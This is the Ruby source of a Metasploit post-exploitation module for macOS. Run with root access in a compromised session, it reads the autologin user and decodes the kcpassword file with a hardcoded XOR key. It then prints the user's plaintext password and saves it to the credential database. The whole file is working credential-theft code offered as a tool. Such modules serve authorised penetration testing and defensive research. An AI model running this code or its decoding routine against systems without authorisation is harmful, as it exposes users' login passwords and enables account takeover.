GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/osx/gather/autologin_password.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
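class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::OSX::Priv

  # Static 11-byte key that kcpassword is XOR-encoded against; the key repeats
  # every 11 bytes of the file. Extract/verify by XORing your kcpassword with
  # your password.
  AUTOLOGIN_XOR_KEY = [0x7D, 0x89, 0x52, 0x23, 0xD2, 0xBC, 0xDD, 0xEA, 0xA3, 0xB9, 0x1F].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'OSX Gather Autologin Password as Root',
        'Description' => %q{
          This module will steal the plaintext password of any user on the machine
          with autologin enabled. Root access is required.

          When a user has autologin enabled (System Preferences -> Accounts), OSX
          stores their password with an XOR encoding in /private/etc/kcpassword.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'joev' ],
        'Platform' => [ 'osx' ],
        'References' => [
          ['URL', 'http://www.brock-family.org/gavin/perl/kcpassword.html']
        ],
        'SessionTypes' => [ 'meterpreter', 'shell' ]
      )
    )

    register_advanced_options([
      OptString.new('KCPASSWORD_PATH', [true, 'Path to kcpassword file', '/private/etc/kcpassword'])
    ])
  end

  # Entry point: verifies root, finds the autologin account, reads and decodes
  # kcpassword, then records the credential in the database.
  #
  # Fails with Failure::NoAccess when not root, Failure::NotVulnerable when no
  # autologin user is configured, and Failure::NotFound when the kcpassword
  # file cannot be read.
  def run
    # ensure the user is root (or can read the kcpassword)
    unless is_root?
      fail_with(Failure::NoAccess, 'Root privileges are required to read kcpassword file')
    end

    # read the autologin account from prefs plist; strip the trailing newline
    # from the command output so it does not end up in the stored username
    # or the status line
    read_cmd = 'defaults read /Library/Preferences/com.apple.loginwindow autoLoginUser username'
    autouser = cmd_exec("/bin/sh -c '#{read_cmd} 2> /dev/null'").to_s.strip

    if autouser.present?
      print_status "User #{autouser} has autologin enabled, decoding password..."
    else
      fail_with(Failure::NotVulnerable, 'No users on this machine have autologin enabled')
    end

    # kcpass contains the XOR'd bytes. Guard the nil/empty case (file missing
    # or unreadable) instead of raising NoMethodError on nil.bytes.
    kcpass = read_file(kcpassword_path)
    if kcpass.nil? || kcpass.empty?
      fail_with(Failure::NotFound, "Unable to read kcpassword file at #{kcpassword_path}")
    end

    decoded = decode_kcpassword(kcpass)

    # save in the database
    # Don't record a Login, since we don't know what service to tie it to
    credential_data = {
      workspace_id: myworkspace_id,
      origin_type: :session,
      session_id: session_db_id,
      post_reference_name: refname,
      username: autouser,
      private_data: decoded,
      private_type: :password
    }

    create_credential(credential_data)
    print_good "Decoded autologin password: #{autouser}:#{decoded}"
  end

  private

  # Decoding routine: slices the raw file into 11-byte chunks, XORs each chunk
  # against AUTOLOGIN_XOR_KEY and returns everything before the first NUL byte.
  #
  # @param raw [String] raw bytes of the kcpassword file
  # @return [String] the decoded password (binary string, NUL-terminated part only)
  def decode_kcpassword(raw)
    key = AUTOLOGIN_XOR_KEY
    plain_bytes = raw.bytes.each_slice(key.length).flat_map do |chunk|
      # zip pairs each byte with its key byte; the last chunk may be short
      chunk.zip(key).map { |byte, k| byte ^ k }
    end
    # Anchor with \z under /m so every byte after the NUL is dropped, even when
    # the trailing bytes contain a newline (a bare $ only reaches end of line).
    plain_bytes.pack('C*').sub(/\x00.*\z/m, '')
  end

  # Path of the kcpassword file, taken from the KCPASSWORD_PATH option.
  def kcpassword_path
    datastore['KCPASSWORD_PATH']
  end

  # Current session user, memoized; not used by #run but kept for callers.
  def user
    @user ||= cmd_exec('whoami').chomp
  end
end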